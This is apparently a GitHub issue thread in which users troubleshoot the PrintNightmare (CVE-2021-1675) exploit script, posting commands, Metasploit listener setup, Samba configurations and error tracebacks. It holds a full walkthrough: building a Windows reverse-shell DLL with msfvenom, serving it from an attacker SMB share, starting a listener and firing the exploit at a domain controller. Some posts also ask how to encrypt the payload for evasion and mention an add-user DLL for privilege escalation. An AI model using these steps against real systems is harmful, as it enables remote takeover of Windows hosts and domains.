File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.
Hitting this error,
Target Server 2016 Datacenter
root@kali:~/Desktop/CVE-2021-1675# python3 CVE-2021-1675.py 'testdomain.local/username:P@[email protected]' '\\172.31.30.112\smb\printer22.dll'
[*] Try 1...
[*] Connecting to ncacn_np:172.31.35.104[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\172.31.30.112\smb\printer22.dll
Traceback (most recent call last):
File "CVE-2021-1675.py", line 119, in <module>
main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
File "CVE-2021-1675.py", line 55, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.
Hello,
in my lab environment I set a small private network with my Kali Linux (latest version), 192.168.145.128, with a samba share correctly configured, and a Windows 10 machine x64 (192.168.145.1) where I would like to inject the malicious dll (a classic shell reverse tcp), by:
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.145.128 LPORT=443 -o /tmp/reverse.dll
I can ping both of the machines on each side of them.
The PrintSpooler service is running on Windows, and from Windows the Linux SMB share can be reached with no issues. The Linux machine does not have ufw installed and the iptables list is:
Chain INPUT (policy ACCEPT)
target prot opt source destination
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Then, I start a listener on Kali machine by using Metasploit:
msf5 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/shell_reverse_tcp
PAYLOAD => windows/x64/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.145.128
LHOST => 192.168.145.128
msf5 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.145.128:443
When I execute the CVE-2021-1675 python script, the output is:
kali@kali:~$ sudo python3.8 CVE-2021-1675.py myusername:[email protected] '\\192.168.145.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.145.1[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_c62e9f8067f98247\Amd64\UNIDRV.DLL
[*] Executing \\192.168.145.128\smb\reverse.dll
[*] Try 1...
[*] Stage0: 0
[*] Try 2...
[*] Stage0: 0
[*] Try 3...
[*] Stage0: 0
But on the listener nothing happens. I don't think the .dll is caught by the Windows antivirus because I added it to the exclusions.
What could be the issue? How can I solve it?
Thank you
Hi, I tried to run the Python script via Windows cmd and Linux Ubuntu 20 WSL; both result in the same error.
C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll
[*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss]
[-] Connection Failed
I shared the re.dll with Samba on Linux; since it was in WSL I thought it did not work, so I just shared a folder with the re.dll inside, gave everyone permission to read/write into the folder and disabled the password requirement in the advanced sharing settings.
I made sure 192.168.5.52 could reach \\192.168.5.101\sft\ manually (and it could).
What am I doing wrong?
Thanks!
Hi team,
I installed impacket as instruction but I still have this issue:
└─$ sudo python CVE-2021-1675.py ntp.vn/tuan_nt:1235&*[email protected] '\\10.10.14.39\smb\reverse.dll'
Traceback (most recent call last):
File "CVE-2021-1675.py", line 2, in
from impacket.dcerpc.v5 import rprn
ImportError: No module named impacket.dcerpc.v5
Help me please!
Hi,
setup: Kali Linux (192.168.0.10)
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f dll -o /tmp/rev.dll
/etc/samba/smb.conf
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[public]
comment = Samba
path = /tmp
guest ok = yes
read only = no
browsable = yes
force user = root
Share works; I can open it from the Win10 system with \\192.168.0.1\public
and can see the rev.dll.
# smbstatus
Samba version 4.13.5-Debian
PID Username Group Machine Protocol Version Encryption Signing
----------------------------------------------------------------------------------------------------------------------------------------
2839 nobody nogroup 192.168.0.12 (ipv4:192.168.0.12:49924) SMB3_11 - -
msfconsole
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.0.10
set lport 4444
run
# python3 CVE-2021-1675.py ./anna:[email protected] '\\192.168.0.10\\public\\rev.dll'
[*] Connecting to ncacn_np:192.168.0.12[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'
victim: Windows 10 21H1 (64bit) build 19043 (192.168.0.12) firewall is disabled
When I try to copy the DLL to the Desktop, for example:
But if I disable the virus check, I get the same error with the Python script.
How do I fix it?
This is how I was able to reproduce the exploit in a virtual environment:
The best practice is to create a Python virtual environment:
python3 -m venv PrintNightmare
source PrintNightmare/bin/activate
git clone https://github.com/cube0x0/CVE-2021-1675.git
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
cp /etc/samba/smb.conf /etc/samba/smb.conf.bak
[global]
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445
[smb]
comment = Samba
path = /tmp/
guest ok = yes
read only = no
browsable = yes
force user = nobody
Spin up SMB share:
impacket-smbserver smb /tmp/
In case you have problems with the SMB share, try to use the built-in smbd service:
service smbd start
Create a reverse shell payload as a DLL:
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<YOUR IP> LPORT=<PORT TO LISTEN> -f dll -o /tmp/rev.dll
nc -lnvp 9001
python3 CVE-2021-1675.py <FQDN>/<USER_Name>:<PASSWORD>@<DC IP> '\\<ATTACKER_IP>\smb\rev.dll'
Machines:
I want to encrypt the DLL payload. How can I do it?
Uninstalled the previous impacket installation and downloaded it from git clone https://github.com/cube0x0/impacket.
Getting the below error. Any idea?
I try to use SharpPrintNightmare LPE with adduser.dll.
I use Visual Studio to build SharpPrintNightmare.exe,
and use this C code to compile the adduser.dll: https://github.com/newsoft/adduser
I run this exploit on many Windows versions and nothing happens.
Please help. Thanks.
Hello.
I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.
Has anyone had the same problem or know how I can solve it please?
Complete stdout:
"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:[email protected] '\\172.16.224.6\smb\fakeprinter.dll'
[*] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \\172.16.224.6\smb\fakeprinter.dll
[*] Try 1...
Traceback (most recent call last):
File "./CVE-2021-1675.py", line 176, in <module>
main(dce, pDriverPath, options.share)
File "./CVE-2021-1675.py", line 84, in main
resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
return dce.request(request)
File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist."
User exists in the AD: "balves"
Target: WS 2019
Thanks
Getting this error when running exploit:
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0xc1 - ERROR_BAD_EXE_FORMAT - %1 is not a valid Win32 application.
I've tried both 32bit and 64bit DLLs via MSFVenom but get the same error for each.